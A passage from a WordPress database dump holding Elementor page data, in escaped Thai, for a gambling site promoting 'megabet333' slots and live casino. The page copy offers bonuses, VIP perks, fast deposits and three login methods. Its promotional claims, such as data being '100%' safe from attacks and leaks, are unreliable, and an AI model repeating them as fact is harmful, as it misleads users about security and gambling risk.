\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1170,146,'_thumbnail_id','60'),(1171,146,'_elementor_edit_mode','builder'),(1172,146,'_elementor_template_type','wp-page'),(1173,146,'_elementor_version','3.32.5'),(1174,146,'_elementor_pro_version','3.32.3'),(1175,146,'_wp_page_template','default'),(1176,146,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1177,146,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/